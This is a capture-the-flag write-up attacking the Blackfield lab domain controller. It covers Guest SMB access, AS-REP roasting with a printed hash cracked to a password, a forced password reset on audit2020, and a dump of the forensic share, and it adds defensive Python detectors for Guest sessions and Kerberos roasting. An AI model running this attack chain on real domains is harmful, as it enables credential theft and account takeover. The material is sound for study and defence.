Table of contents
- Footprinting
- Privilege escalation
- ntdsutil.exe / DSInternals extraction method (NTDS + SYSTEM) (requires admin !)
- PsExec isn’t possible ? :(
Just another Anonymous-Guest / ASREPRoast / ForceChangePassword / UserEnum / LSASS / Registry Hive / NTDS_SAM-SYSTEM Decryption Write-up.
There might be some discrepancies in this article. Indeed, I will sometimes use cme, and some other times nxc. The methodology, however, remains identical. In the context of this article, cme and nxc are interchangeable.
Footprinting
Open ports
The open ports found by a classic Nmap SYN scan are:
jamarir@kali:~$ nmap -p- -v10 -Pn --disable-arp-ping -oN tcp_full.nmap 10.10.10.192
[...]
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
The ports:
- 135/593 (RPC), 139/445 (NetBIOS/SMB) and 5985 (WinRM) show this is a Windows machine.
- 53 (DNS), 389 (LDAP) and, most importantly, 88 (Kerberos) show this is a Domain Controller.
Since the target is also a DNS server, let's add it to our local resolver configuration:
jamarir@kali:~$ sudo sed -i '1i nameserver 10.10.10.192' /etc/resolv.conf
Our target is a Windows 10 / Server 2019 DC, whose FQDN (Fully Qualified Domain Name) is DC01.BLACKFIELD.local:
jamarir@kali:~$ nxc smb 10.10.10.192
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
Null or Guest SMB Spider ?
The null/anonymous account is disabled. Indeed, providing a blank username and password isn’t allowed:
jamarir@kali:~$ nxc smb 10.10.10.192 -u '' -p '' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\:
SMB 10.10.10.192 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
Howbeit, the Guest account is allowed, using the username a for example, and a blank password:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'a' -p '' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\a: (Guest)
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL Logon server share
We could also have used the username Guest (case-insensitive) instead, giving the same result:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'guest' -p '' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\guest:
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL Logon server share
By default, the Guest account is disabled. When enabled, it has a blank password by default, and has limited access to the local server or domain.
Also, notice how the account a is considered to be a Guest account in the first nxc output above. Here's the Wireshark traffic when authenticating with the credentials a: (username a, blank password):
The request is made by a, but the server interprets our authentication as Guest, setting SMB2_SESSION_FLAG_IS_GUEST to true. As this WhiteFlag article shows, when the account used to authenticate (a here) isn't known by the server, it implicitly switches to the Guest account (domain or local).
As Microsoft's documentation states: “Every computer has a local Guest account, and every domain has a domain Guest account. […] Unlike Anonymous Logon, Guest is a real account, and it can be used to sign in interactively. The Guest account doesn't require a password [by default], but it can have one.”
Notice that authenticating as Guest with a non-blank password isn't allowed, as its password is literally blank:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Guest' -p 'a' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\Guest:a STATUS_LOGON_FAILURE
Thus, to limit unauthorized access, the Guest domain AND local accounts must be disabled.
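The implicit Guest fallback above is visible in the SMB2 SESSION_SETUP response itself, so a packet capture from a DC can be screened for it. The following parser is an added example, not code from the original write-up: it decodes the SMB2 header and SESSION_SETUP response body (layout from MS-SMB2) and reports sessions the server flagged as Guest or Null; the packet builder only produces constructed samples for the test, not real DC01 traffic.

```python
"""Flag SMB2 sessions that the server downgraded to Guest or Null.

Added example (not from the original write-up): parses SMB2 SESSION_SETUP
responses, as seen in the Wireshark capture, and decodes SessionFlags so a
capture can be screened for implicit Guest fallback.
Layout follows MS-SMB2 2.2.1.2 (header) and 2.2.6 (response body).
"""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_SESSION_SETUP = 0x0001              # Command field value
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001  # set on every server response

# SessionFlags bits of the SESSION_SETUP response (MS-SMB2 2.2.6)
SMB2_SESSION_FLAG_IS_GUEST = 0x0001
SMB2_SESSION_FLAG_IS_NULL = 0x0002
SMB2_SESSION_FLAG_ENCRYPT_DATA = 0x0004


def parse_session_setup_response(pkt: bytes) -> dict:
    """Return status, session id and decoded SessionFlags of one SMB2 packet
    (without the 4-byte NetBIOS session header). Raises ValueError when the
    packet is not an SMB2 SESSION_SETUP response."""
    if len(pkt) < 68 or pkt[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 packet")
    # Header: ProtocolId(4) StructureSize(2) CreditCharge(2) Status(4)
    #         Command(2) CreditRequest(2) Flags(4) NextCommand(4)
    #         MessageId(8) Reserved(4) TreeId(4) SessionId(8) Signature(16)
    (struct_size, _credit_charge, status, command, _credits, flags,
     _next, _msg_id, _reserved, _tree_id, session_id) = struct.unpack_from(
        "<HHIHHIIQIIQ", pkt, 4)
    if struct_size != 64:
        raise ValueError("bad SMB2 header size")
    if command != SMB2_SESSION_SETUP or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a SESSION_SETUP response")
    # Body: StructureSize(2)=9, SessionFlags(2), SecurityBufferOffset(2),
    #       SecurityBufferLength(2), then the variable security buffer
    body_size, session_flags = struct.unpack_from("<HH", pkt, 64)
    if body_size != 9:
        raise ValueError("bad SESSION_SETUP response body")
    return {
        "status": status,
        "session_id": session_id,
        "is_guest": bool(session_flags & SMB2_SESSION_FLAG_IS_GUEST),
        "is_null": bool(session_flags & SMB2_SESSION_FLAG_IS_NULL),
        "encrypted": bool(session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA),
    }


def build_session_setup_response(session_id: int, session_flags: int,
                                 status: int = 0) -> bytes:
    """Constructed sample (not a real capture): a minimal SESSION_SETUP
    response with an empty security buffer, enough for the parser above."""
    header = SMB2_MAGIC + struct.pack(
        "<HHIHHIIQIIQ", 64, 0, status, SMB2_SESSION_SETUP, 1,
        SMB2_FLAGS_SERVER_TO_REDIR, 0, 1, 0, 0, session_id) + b"\x00" * 16
    body = struct.pack("<HHHH", 9, session_flags, 64 + 8, 0) + b"\x00"
    return header + body


def find_downgraded_sessions(packets):
    """Screen a list of SMB2 packets; return (session_id, kind) for every
    session the server treated as Guest or Null. Requests, other commands
    and malformed packets are skipped."""
    hits = []
    for pkt in packets:
        try:
            info = parse_session_setup_response(pkt)
        except ValueError:
            continue
        if info["status"] != 0:   # only STATUS_SUCCESS establishes a session
            continue
        if info["is_guest"]:
            hits.append((info["session_id"], "guest"))
        elif info["is_null"]:
            hits.append((info["session_id"], "null"))
    return hits
```

On a real capture, feed each SMB2 message (NetBIOS header stripped) to find_downgraded_sessions; a Guest hit from a username that does not exist in the domain is exactly the fallback the text describes.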
So the Guest account is enabled, and we can access some shares, especially the profiles$ one, which contains a LOT of user directories:
jamarir@kali:~$ smbclient.py 'BLACKFIELD.local/a:@10.10.10.192'
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# use profiles$
# ls
drw-rw-rw- 0 Wed Jun 3 18:47:12 2020 .
drw-rw-rw- 0 Wed Jun 3 18:47:12 2020 ..
drw-rw-rw- 0 Wed Jun 3 18:47:11 2020 AAlleni
drw-rw-rw- 0 Wed Jun 3 18:47:11 2020 ABarteski
drw-rw-rw- 0 Wed Jun 3 18:47:11 2020 ABekesz
[...]
The directories are empty, for example:
# cd WZelazny
# ls
drw-rw-rw- 0 Wed Jun 3 18:47:12 2020 .
drw-rw-rw- 0 Wed Jun 3 18:47:12 2020 ..
Instead of looking at each directory one by one, we could use NetExec's spider_plus module, which returns the share's directory architecture:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'a' -p '' -d BLACKFIELD.local -M spider_plus -o OUTPUT_FOLDER='nxc_spider_plus' DOWNLOAD_FLAG='False' EXCLUDE_FILTER='PRINT$,IPC$' EXCLUDE_EXTS='ico,lnk,svg'
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.10.192 445 DC01 [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.10.192 445 DC01 [*] STATS_FLAG: True
SPIDER_PLUS 10.10.10.192 445 DC01 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.10.192 445 DC01 [*] EXCLUDE_EXTS: ['ico', 'lnk', 'svg']
SPIDER_PLUS 10.10.10.192 445 DC01 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.10.192 445 DC01 [*] OUTPUT_FOLDER: nxc_spider_plus
[...]
SPIDER_PLUS 10.10.10.192 445 DC01 [+] Saved share-file metadata to "nxc_spider_plus/10.10.10.192.json".
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Shares: 7 (ADMIN$, C$, forensic, IPC$, NETLOGON, profiles$, SYSVOL)
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Readable Shares: 2 (IPC$, profiles$)
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Total folders found: 314
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Total files found: 0
No file is present in any of the folders:
jamarir@kali:~$ cat nxc_spider_plus/10.10.10.192.json
{
"profiles$": {}
}%
We could also double-check that result by mounting the share locally and exploring it ourselves, but nothing is returned either:
jamarir@kali:~$ sudo umount /mnt 2>/dev/null; sudo mount -t cifs -o 'username=a,password=,domain=BLACKFIELD.local' '//10.10.10.192/profiles$' /mnt/;
jamarir@kali:~$ find /mnt/ -type f
[Blank output]
ASREPRoast, as usual !
You might check my Sauna CTF article, among many resources, for more details on this attack.
We actually have a list of usernames, so, according to the WADComs cheatsheet, we could either:
- Perform a password spray attack (where 1 password is tried against all users). However, we have no good password candidate for this attack, so we can set this one aside.
- Check which accounts are ASREPRoastable (where the user doesn't have to provide credentials when it authenticates against the DC).
To perform that second option, we can extract the usernames with a regex, using:
- smbclient:
jamarir@kali:~$ smbclient --user 'BLACKFIELD.local/a' --password '' '//10.10.10.192/profiles$' -c 'ls' |grep -v 'blocks available' |grep -oP '^\s+\K[^. ]+' > users.txt
- Or the smbclient.py script from the impacket suite:
jamarir@kali:~$ smbclient.py -no-pass 'BLACKFIELD.local/a@10.10.10.192' <<<$(echo 'use profiles$\nls') |grep -oP '^drw-rw-rw-.*?2020 \K[^. ]+$' > users.txt
And look for ASREPRoastable accounts using the impacket GetNPUsers.py script.
Note that most of the directories actually correspond to non-existent users. We filter these out by removing the KDC_ERR_C_PRINCIPAL_UNKNOWN error lines from the output:
jamarir@kali:~$ GetNPUsers.py -dc-ip 10.10.10.192 BLACKFIELD.local/ -usersfile users.txt -format hashcat |grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:7e050d621bda7d00bd78ab90d68f001e$2ec0c0424b454dd161bd712dc926d2487ac2d3658f3963c063941937fb627d91ba887ad20df5a00ba42c2ba0d275a66c12c147b06134dc191146418cd10b7ffd0a6e809c7ab6d17cfe0a2d0e256c066671329129a8f7e6581a457dfe9849809fbf5b31a21d4ce566e4052abd4f01e5130566cb8c3696551cd183fee995a5c36a2f6de5c84f01551db339a16bdece881e2f7c801acf5d07fc8ac0564c2fb6e647660b699339ae129225666b61f7b239771e5f6189188a0e810b36300e567867fe52f7e578680fd7055c2df21c94fdbed2c32a1b7fec44f234ac320a653f281c7460aa2c5f4925ee03576f7ee4d26b1d9d61092394
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
3 domain users exist: audit2020, support, and svc_backup. support is ASREPRoastable, as we got its AS-REP hash (encrypted with a key derived from the user's password). Therefore, we may crack it offline:
jamarir@kali:~$ echo '$krb5asrep$23$support@BLACKFIELD.LOCAL:7e[...]94' |john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt /dev/stdin
[...]
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL)
Bingo!! Now, with a domain account, we can access LDAP and fire up BloodHound, and start some privesc stuff !
jamarir@kali:~$ bloodhound.py -u 'support' -p '#00^BlackKnight' -d 'blackfield.local' -dc dc01.blackfield.local -ns 10.10.10.192 -c all --zip
Privilege escalation
BloodHound reveals that only the SVC_BACKUP domain user can access a WinRM session on the DC, being a member of the Remote Management Users domain group:
So, we'll probably need to impersonate SVC_BACKUP to get a foothold on the box.
support, support audit2020's password reset plz !
BloodHound shows that support has the ForceChangePassword right on audit2020, whose Help popup shows:
Note that support has access over the RPC, LDAP and SMB protocols on DC01.BLACKFIELD.LOCAL:
jamarir@kali:~$ for proto in ssh smb rdp vnc winrm ldap mssql wmi ftp; do (nxc $proto 10.10.10.192 -u 'support' -p '#00^BlackKnight' &); done
RPC 10.10.10.192 135 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
Then, we can easily exploit that privesc by updating audit2020's password, using:
- Set-DomainUserPassword from the PowerSploit GitHub repo (copied in Documents\WindowsPowerShell\Modules):
PS C:\Users\jamarir> (Get-ChildItem $env:USERPROFILE\Documents\WindowsPowerShell\Modules).Name
PowerSploit-master
PS C:\Users\jamarir> Import-Module -Force $env:USERPROFILE\Documents\WindowsPowerShell\Modules\PowerSploit-master\PowerSploit.psm1
PS C:\Users\jamarir> Set-DomainUserPassword -Identity 'audit2020' -AccountPassword (ConvertTo-SecureString 'SuperAud1t2021!' -AsPlainText -Force) -Domain BLACKFIELD.LOCAL -Credential (New-Object System.Management.Automation.PSCredential('BLACKFIELD.LOCAL\support',(ConvertTo-SecureString '#00^BlackKnight' -AsPlainText -Force)))
- Or rpcclient:
jamarir@kali:~$ rpcclient 10.10.10.192 -c 'setuserinfo2 audit2020 23 "SuperAud1t2021!";quit' -U BLACKFIELD.local/'support'%'#00^BlackKnight'
- Or net rpc password:
jamarir@kali:~$ net rpc password 'audit2020' 'SuperAud1t2021!' -U BLACKFIELD.local/'support'%'#00^BlackKnight' -S "BLACKFIELD.local"
A password policy forbids the username being in the password:
jamarir@kali:~$ net rpc password "audit2020" 'SuperAudit2021!' -U BLACKFIELD.local/'support'%'#00^BlackKnight' -S "BLACKFIELD.local"
Failed to set password for 'audit2020' with error: Unable to update the password. The value provided for the new password does not meet the length, complexity, or history requirements of the domain..
Indeed, the domain password policy's complexity flag is set:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'support' -p '#00^BlackKnight' --pass-pol
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] Dumping password info for domain: BLACKFIELD
SMB 10.10.10.192 445 DC01 Minimum password length: 7
SMB 10.10.10.192 445 DC01 Password history length: 24
SMB 10.10.10.192 445 DC01 Maximum password age: 41 days 23 hours 53 minutes
SMB 10.10.10.192 445 DC01
SMB 10.10.10.192 445 DC01 Password Complexity Flags: 000001
SMB 10.10.10.192 445 DC01 Domain Refuse Password Change: 0
SMB 10.10.10.192 445 DC01 Domain Password Store Cleartext: 0
SMB 10.10.10.192 445 DC01 Domain Password Lockout Admins: 0
SMB 10.10.10.192 445 DC01 Domain Password No Clear Change: 0
SMB 10.10.10.192 445 DC01 Domain Password No Anon Change: 0
SMB 10.10.10.192 445 DC01 Domain Password Complex: 1
SMB 10.10.10.192 445 DC01
SMB 10.10.10.192 445 DC01 Minimum password age: 1 day 4 minutes
SMB 10.10.10.192 445 DC01 Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.192 445 DC01 Locked Account Duration: 30 minutes
SMB 10.10.10.192 445 DC01 Account Lockout Threshold: None
SMB 10.10.10.192 445 DC01 Forced Log off Time: Not Set
As we can read in Microsoft's documentation, the password must contain characters from at least 3 categories, and it CAN'T contain the user's samAccountName or displayName (case-insensitive). So the following users cannot have their sAMAccountName or displayName in their respective passwords:
jamarir@kali:~$ nxc ldap 10.10.10.192 -u 'support' -p '#00^BlackKnight' -d 'BLACKFIELD.local' --query "(&(objectClass=person)(!(lastlogon=0)))" "sAMAccountName displayName"
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.10.10.192 389 DC01 [+] Response for object: CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local
LDAP 10.10.10.192 389 DC01 sAMAccountName: Administrator
LDAP 10.10.10.192 389 DC01 [+] Response for object: CN=Guest,CN=Users,DC=BLACKFIELD,DC=local
LDAP 10.10.10.192 389 DC01 sAMAccountName: Guest
LDAP 10.10.10.192 389 DC01 [+] Response for object: CN=DC01,OU=Domain Controllers,DC=BLACKFIELD,DC=local
LDAP 10.10.10.192 389 DC01 sAMAccountName: DC01$
LDAP 10.10.10.192 389 DC01 [+] Response for object: CN=support,CN=Users,DC=BLACKFIELD,DC=local
LDAP 10.10.10.192 389 DC01 sAMAccountName: support
LDAP 10.10.10.192 389 DC01 [+] Response for object: CN=svc_backup,CN=Users,DC=BLACKFIELD,DC=local
LDAP 10.10.10.192 389 DC01 sAMAccountName: svc_backup
(N.B.: None of these LDAP entries have a displayName attribute.)
Now we have compromised the account audit2020:SuperAud1t2021! !
Side-note : Enumerate valid domain accounts
Notice that in order to retrieve valid accounts in the domain (i.e. without the KDC_ERR_C_PRINCIPAL_UNKNOWN error), we might:
- LDAP-filter out accounts that haven't logged in at least once, with (!(lastlogon=0)) (see the query above). However, this might miss valid accounts that have never logged on.
- Use the kerbrute enumerator, which requests a TGT for each user and filters for existing domain users:
jamarir@kali:~$ kerbrute userenum -d BLACKFIELD.local --dc 10.10.10.192 users.txt
[...]
<DATE> > Using KDC(s):
<DATE> > 10.10.10.192:88
<DATE> > [+] VALID USERNAME: audit2020@BLACKFIELD.local
<DATE> > [+] VALID USERNAME: support@BLACKFIELD.local
<DATE> > [+] VALID USERNAME: svc_backup@BLACKFIELD.local
<DATE> > Done! Tested 314 usernames (3 valid) in 161.354 seconds
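Both the GetNPUsers.py run in the ASREPRoast section and the kerbrute run above leave Windows Security event 4768 (TGT requested) on the DC, so they can be spotted from the DC's own logs. The detection below is an added example, not part of the write-up; the event records are constructed samples shaped like 4768 fields (TargetUserName, IpAddress, Status, PreAuthType, TicketEncryptionType), not real DC01 logs, and the 20-names-in-5-minutes threshold is my assumption.

```python
"""Spot AS-REP roasting and Kerberos username enumeration in DC logs.

Added example (not part of the write-up): two detections over Security
event 4768, "A Kerberos authentication ticket (TGT) was requested":
  * AS-REP roast: a successful TGT request with Pre-Authentication Type 0
    (the UF_DONT_REQUIRE_PREAUTH account) and RC4 ticket encryption 0x17,
    the "23" in the $krb5asrep$23$ hash above.
  * Username enumeration: one client IP collecting many distinct
    KDC_ERR_C_PRINCIPAL_UNKNOWN (Status 0x6) failures in a short window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # 4768 Status for a non-existent principal
KDC_ERR_PREAUTH_REQUIRED = 0x19     # 4768 Status for an existing user w/o pre-auth data
ETYPE_RC4_HMAC = 0x17               # TicketEncryptionType 23
PREAUTH_NONE = 0                    # PreAuthType "0": no pre-authentication
ENUM_THRESHOLD = 20                 # assumed: distinct unknown users per source/window
ENUM_WINDOW = timedelta(minutes=5)


def is_asrep_roast(ev: dict) -> bool:
    """True for a successful 4768 without pre-auth and with an RC4 ticket."""
    return (ev["EventID"] == 4768
            and int(ev["Status"], 16) == 0
            and int(ev["PreAuthType"]) == PREAUTH_NONE
            and int(ev["TicketEncryptionType"], 16) == ETYPE_RC4_HMAC)


def asrep_roast_targets(events):
    """(account, source IP) pairs whose AS-REP was handed out without pre-auth."""
    return sorted({(ev["TargetUserName"].lower(), ev["IpAddress"])
                   for ev in events if is_asrep_roast(ev)})


def username_enum_sources(events, threshold=ENUM_THRESHOLD, window=ENUM_WINDOW):
    """Source IPs with >= threshold distinct unknown-principal failures inside
    any sliding `window`; maps IP -> largest distinct count seen."""
    per_ip = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 4768 and int(ev["Status"], 16) == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            per_ip[ev["IpAddress"]].append((ev["Time"], ev["TargetUserName"].lower()))
    flagged = {}
    for ip, items in per_ip.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            distinct = {name for _, name in items[start:end + 1]}
            if len(distinct) >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), len(distinct))
    return flagged


def sample_events():
    """Constructed 4768 records mimicking what the users.txt sweep above
    would leave on the DC (failed requests carry PreAuthType "-" and
    TicketEncryptionType 0xffffffff)."""
    t0 = datetime(2020, 6, 3, 12, 0, 0)

    def rec(sec, user, ip, status, preauth, etype):
        return {"EventID": 4768, "Time": t0 + timedelta(seconds=sec),
                "TargetUserName": user, "IpAddress": ip, "Status": status,
                "PreAuthType": preauth, "TicketEncryptionType": etype}

    ev = []
    # kerbrute-style burst: most names from profiles$ do not exist
    for i in range(30):
        ev.append(rec(i, f"user{i:03d}", "10.10.14.5", "0x6", "-", "0xffffffff"))
    # the real users answer differently: support needs no pre-auth
    ev.append(rec(31, "support", "10.10.14.5", "0x0", "0", "0x17"))
    ev.append(rec(32, "svc_backup", "10.10.14.5", "0x19", "-", "0xffffffff"))
    # a normal workstation logon: pre-auth done, AES ticket
    ev.append(rec(60, "audit2020", "10.10.10.50", "0x0", "2", "0x12"))
    # scattered typos from another host, spread over 40 minutes
    for i in range(5):
        ev.append(rec(600 * i, f"typo{i}", "10.10.10.51", "0x6", "-", "0xffffffff"))
    return ev
```

Hardening the support account (clearing UF_DONT_REQUIRE_PREAUTH) removes the first signal; the second one stays useful against any name sweep from the profiles$ listing.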
audit2020, forensic the share plz !
audit2020 has READ access to an uncommon share named forensic:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'audit2020' -p 'SuperAud1t2021!' -d BLACKFIELD.local --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:SuperAud1t2021!
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
We may use the spider_plus module of nxc again, this time to dump it locally (DOWNLOAD_FLAG='True' option):
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'audit2020' -p 'SuperAud1t2021!' -d BLACKFIELD.local -M spider_plus -o OUTPUT_FOLDER='forensic_dump' DOWNLOAD_FLAG='True' EXCLUDE_FILTER='PRINT$,IPC$,NETLOGON,SYSVOL,profiles$' EXCLUDE_EXTS='ico,lnk,svg'
[...]
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Shares: 7 (ADMIN$, C$, forensic, IPC$, NETLOGON, profiles$, SYSVOL)
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Readable Shares: 5 (forensic, IPC$, NETLOGON, profiles$, SYSVOL)
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Filtered Shares: 4
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Total folders found: 38
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Total files found: 720
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Files filtered: 257
SPIDER_PLUS 10.10.10.192 445 DC01 [*] File size average: 985.69 KB
SPIDER_PLUS 10.10.10.192 445 DC01 [*] File size min: 0 B
SPIDER_PLUS 10.10.10.192 445 DC01 [*] File size max: 125.87 MB
SPIDER_PLUS 10.10.10.192 445 DC01 [*] File unique exts: 21 (.lib, .txt, .png, .dll, .py, .cnt, .hlp, .md, .pl, .c...)
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Downloads successful: 447
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Downloads failed: 16
jamarir@kali:~$ tree forensic_dump -d
nxc_spider_plus
└── 10.10.10.192
└── forensic
├── commands_output
└── tools
├── sleuthkit-4.8.0-win32
│ ├── bin
│ ├── lib
│ └── licenses
├── sysinternals
└── volatility
├── contrib
│ ├── library_example
│ └── plugins
│ ├── aspaces
│ └── malware
├── pyinstaller
├── resources
├── tools
│ ├── doxygen
│ │ └── d3
│ ├── linux
│ │ └── kcore
│ ├── mac
│ └── windows
└── volatility
├── plugins
│ ├── addrspaces
│ ├── gui
│ │ └── vtypes
│ ├── linux
│ ├── mac
│ ├── malware
│ ├── overlays
│ │ ├── linux
│ │ ├── mac
│ │ └── windows
│ └── registry
├── renderers
└── win32
We're not that interested in the tools folder, as it mostly contains standard forensic tools.
The memory_analysis directory wasn't dumped by nxc:
jamarir@kali:~$ smbclient.py 'BLACKFIELD.local/audit2020:SuperAud1t2021!@10.10.10.192'
[...]
# use forensic
# ls
drw-rw-rw- 0 Sun Feb 23 16:10:16 2020 .
drw-rw-rw- 0 Sun Feb 23 16:10:16 2020 ..
drw-rw-rw- 0 Sun Feb 23 19:14:37 2020 commands_output
drw-rw-rw- 0 Thu May 28 22:29:24 2020 memory_analysis
drw-rw-rw- 0 Fri Feb 28 23:30:34 2020 tools
That's because, by default, the maximum file size to download is set to 51K (MAX_FILE_SIZE option):
jamarir@kali:~$ nxc smb -M spider_plus --options
[*] spider_plus module options:
List files recursively (excluding `EXCLUDE_FILTER` and `EXCLUDE_EXTS` extensions) and save JSON share-file metadata to the `OUTPUT_FOLDER`.
If `DOWNLOAD_FLAG`=True, download files smaller then `MAX_FILE_SIZE` to the `OUTPUT_FOLDER`.
DOWNLOAD_FLAG Download all share folders/files (Default: False)
STATS_FLAG Disable file/download statistics (Default: True)
EXCLUDE_EXTS Case-insensitive extension filter to exclude (Default: ico,lnk)
EXCLUDE_FILTER Case-insensitive filter to exclude folders/files (Default: print$,ipc$)
MAX_FILE_SIZE Max file size to download (Default: 51200)
OUTPUT_FOLDER Path of the local folder to save files (Default: /tmp/nxc_spider_plus)
Instead, we could increase that MAX_FILE_SIZE value, or mount the share locally to check the memory_analysis folder in /mnt:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'audit2020' -p 'SuperAud1t2021!' -d BLACKFIELD.local -M spider_plus -o OUTPUT_FOLDER='forensic_dump' DOWNLOAD_FLAG='True' EXCLUDE_FILTER='PRINT$,IPC$,NETLOGON,SYSVOL,profiles$' EXCLUDE_EXTS='ico,lnk,svg' MAX_FILE_SIZE=999999
jamarir@kali:~$ sudo umount /mnt 2>/dev/null; sudo mount -t cifs -o 'username=audit2020,password=SuperAud1t2021!,domain=BLACKFIELD.local' '//10.10.10.192/forensic' /mnt;
jamarir@kali:~$ ls -lhs /mnt/memory_analysis/
total 495M
